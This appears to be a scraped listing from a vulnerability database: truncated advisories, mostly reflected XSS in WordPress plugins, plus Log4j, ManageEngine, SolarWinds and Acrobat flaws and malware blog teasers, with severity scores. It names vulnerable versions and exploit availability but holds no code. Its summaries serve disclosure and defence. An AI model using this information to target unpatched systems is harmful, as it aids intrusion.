The Huawei viewpoint VP9610 and VP9620 units for the Huawei Video Conference system do not update the Session ID upon successful establishment of a login session, which allows remote authenticated users to hijack sessions via an unspecified interception...
6.4AI Score
0.002EPSS
Integrating Live Patching in SecDevOps Workflows
SecDevOps is, just like DevOps, a transformational change that organizations undergo at some point during their lifetime. Just like many other big changes, SecDevOps is commonly adopted after a reality check of some kind: a big damaging cybersecurity incident, for example. A major security breach.....
-0.3AI Score
Adobe Acrobat Reader DC overlapping annotations type confusion vulnerability
Summary A type confusion vulnerability exists in the way Adobe Acrobat Reader DC 2022.001.20085 deals with overlapping annotations. A specially-crafted PDF document can trigger this vulnerability, which can lead to arbitrary code execution. A victim needs to open the malicious file to trigger this....
7.8CVSS
0.1AI Score
0.001EPSS
Dynamic analysis of firmware components in IoT devices
Among the various offensive security techniques, vulnerability assessment takes priority when it comes to analyzing the security of IoT/IIoT devices. In most cases, such devices are analyzed using the black box testing approach, in which the researcher has virtually no knowledge about the object...
-0.6AI Score
An issue was discovered in libmatio.a in matio (aka MAT File I/O Library) 1.5.13. There is a stack-based buffer over-read in Mat_VarReadNextInfo5() in...
9.1CVSS
2.9AI Score
0.006EPSS
Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck
Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident...
AI Score
What is threat modeling ❓ Definition, Methods, Example
Threat modeling is a method for upgrading the security of an application, system, or business process by distinguishing objections and weaknesses, just as carrying out countermeasures to stay away from or alleviate the impacts of structure dangers. Threat modeling supports recognizing the security....
-0.2AI Score
Introduction Are you an organization that manages or hosts a huge pool of resources on remote locations/servers? Well, host-based authority-validation technique is the most-suited way to manage the access and control rights related to your hardware and applications. Once implemented, this identity....
-0.3AI Score
Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin...
9.8CVSS
9.6AI Score
0.005EPSS
Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin...
9.8CVSS
9.5AI Score
0.005EPSS
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context.....
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message....
KLA12390 RCE vulnerability in Apache Log4j
Remote code execution vulnerability was found in Apache Log4j. Malicious users can exploit this vulnerability to execute arbitrary code. Original advisories Apache Log4j Security Vulnerabilities Exploitation Public exploits exist for this vulnerability. Malware exists for this vulnerability....
10CVSS
10AI Score
0.976EPSS
A closer look at Qakbot’s latest building blocks (and how to knock them down)
Multiple Qakbot campaigns that are active at any given time prove that the decade-old malware continues to be many attackers’ tool of choice, a customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it. Since emerging in 2007 as a banking Trojan,...
AI Score
A closer look at Qakbot’s latest building blocks (and how to knock them down)
Multiple Qakbot campaigns that are active at any given time prove that the decade-old malware continues to be many attackers’ tool of choice, a customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it. Since emerging in 2007 as a banking Trojan,...
AI Score
Not with a Bang but a Whisper: The Shift to Stealthy C2
As defensive tools have evolved to detect more and more traditional attack techniques, it should come as no surprise that attackers have shifted tactics. This ever-evolving arms race between offensive security toolsets, bespoke advanced persistent threat (APT) malware and the billion-dollar...
-0.5AI Score
The cost of data security – it’s not just about the numbers
Organizations striving to improve their security posture often find this a multi-faceted challenge. In addition to the security product evaluation itself, security budgets are tight and justification is a necessary step. Financial language, however, is not everyone’s forte - and fiscal...
0.5AI Score
Exploit for Deserialization of Untrusted Data in Solarwinds Orion Platform
CVE-2021-35215 SolarWinds Orion Platform ActionPluginBaseView...
8.9CVSS
8.9AI Score
0.121EPSS
Many individuals know about red groups ‒ moral programmers who test the security protections of an association by dispatching assaults in a controlled climate. Red groups are gone against by blue groups, who are entrusted with assessing an association’s security availability, forestalling red...
-0.4AI Score
A3: Sensitive Data Exposure ❗️ — Top 10 OWASP 2017
A3: Sensitive Data Exposure ❗️ — Top 10 OWASP 2017 Introduction I feel like a lot of mystery surrounds this issue from the top 10 OWASP vulnerabilities. A lot of people seem to wonder which data is sensitive when exposed. Some people seem to think every single API key disclosed in a JS file is a...
7.5CVSS
7.7AI Score
0.001EPSS
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.1CVSS
6AI Score
0.002EPSS
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.1CVSS
0.002EPSS
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.1CVSS
6.1AI Score
0.002EPSS
CVE-2021-24435 Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.3AI Score
0.002EPSS
Watch what you send on anonymous SMS websites
It's a good idea to try and keep certain things private. For example, people have been using anonymous email services for years. These either hide your real email address, or replace it entirely for specific tasks. Folks will go one step further, setting aliases for each service they sign up to....
-0.5AI Score
WordPress Woosaleskit Bar plugin <= 1.0.0 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Woosaleskit Bar plugin (versions <= 1.0.0). Solution This plugin has been closed as of May 2, 2019 and is not available for download. Reason: Guideline...
3.1AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Events Shortcodes & Templates For The Events Calendar plugin (versions <= 1.7.1). Solution Update the WordPress Events Shortcodes & Templates For The Events Calendar plugin to the latest...
2AI Score
WordPress Venture Event Manager plugin <= 3.2.4 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Venture Event Manager plugin (versions <= 3.2.4). Solution Update the WordPress Venture Event Manager plugin to the latest available version (at least...
2.1AI Score
WordPress BetterOptin plugin <= 2.0.2 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress BetterOptin plugin (versions <= 2.0.2). Solution This plugin has been closed and is no longer available for...
3.1AI Score
WordPress WP Mobile Menu plugin <= 2.8.2.2 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress WP Mobile Menu plugin (versions <= 2.8.2.2). Solution Update the WordPress WP Mobile Menu plugin to the latest available version (at least...
2AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Total Sales For Woocommerce plugin (versions <= 1.1). Solution 2021-08-27 - no patched version...
2.1AI Score
WordPress Awesome Support plugin <= 6.0.8 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Awesome Support plugin (versions <= 6.0.8). Solution Update the WordPress Awesome Support plugin to the latest available version (at least...
2.1AI Score
WordPress Icons with Links Widget plugin <= 1.2 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Icons with Links Widget plugin (versions <= 1.2). Solution This plugin has been closed as of July 5, 2021 and is not available for download. This closure is temporary, pending a full...
2.6AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Request Quote via Whatsapp for Woocommerce plugin (versions <= 1.0.1). Solution This plugin has been closed as of September 25, 2019 and is not available for...
3.9AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex in WordPress 4k Icons for Visual Composer plugin (versions <= 1.0). Solution This plugin has been closed and is no longer available for...
6.1CVSS
3.1AI Score
0.002EPSS
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Ad Blocker Notify Lite plugin (versions <= 2.4.0). Solution 2021-08-25 - no patched version is available. Deactivate and...
2.5AI Score
Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues Edit (WPScanTeam): - The original report mentioned the issue in the...
6.1CVSS
0.1AI Score
0.002EPSS
WordPress Border Loading Bar plugin <= 1.0.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Border Loading Bar plugin (versions <= 1.0.1). Solution This plugin has been closed as of September 7, 2021 and is not available for download. This closure is temporary, pending a full...
2.5AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Facebook Page Feed Timeline plugin (versions <= 1.0). Solution This plugin has been closed as of July 15, 2019 and is not available for download. This closure is permanent. Reason: Author...
2AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Product Limited Time Availability Date for WooCommerce plugin (versions <= 1.0.1). Solution 2021-08-27 - no patched version...
1.9AI Score
WordPress AMP extensions plugin <= 1.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress AMP extensions plugin (versions <= 1.1). Solution 2021-08-25 - no patched version is available. Deactivate and...
2.4AI Score
Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues Edit (WPScanTeam): - The original report mentioned the issue in the...
6.1CVSS
0.5AI Score
0.002EPSS
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex in WordPress Disable Image Right Click plugin (versions <= 1.0). Solution Deactivate and delete. This plugin has been closed as of January 6, 2022 and is not available for download. This closure is temporary, pending a full.....
6.1CVSS
1.7AI Score
0.002EPSS
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress W3SCloud Contact Form 7 to Zoho CRM plugin (versions <= 1.1.0). Solution Update the WordPress W3SCloud Contact Form 7 to Zoho CRM plugin to the latest available version (at least...
2AI Score
WordPress Stars Menu plugin <= 1.0.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Stars Menu plugin (versions <= 1.0.1). Solution 2021-08-27 - no patched version...
2.2AI Score
WordPress Кнопка Яндекс Денег plugin <= 2.3.3 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Кнопка Яндекс Денег plugin (versions <= 2.3.3). Solution Update the WordPress Кнопка Яндекс Денег plugin to the latest available version (at least...
1.6AI Score
WordPress Affiliate PRO plugin <= 1.3.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Affiliate PRO plugin (versions <= 1.3.1). Solution This plugin has been closed and is no longer available for...
3.9AI Score
WordPress tcS3 plugin <= 2.1.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress tcS3 plugin (versios <= 2.1.1). Solution 2021-08-27 - no patched version...
2.1AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress TR Easy Google Analytics plugin (versions <= 1.0.0). Solution This plugin has been closed as of October 23, 2018 and is not available for download. Reason: Guideline...
3.1AI Score
WordPress Titan Framework plugin <= 1.12.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Titan Framework plugin (versions <= 1.12.1). Solution This plugin has been closed as of March 16, 2021 and is not available for download. This closure is permanent. Reason: Author...
6.1CVSS
2.7AI Score
0.002EPSS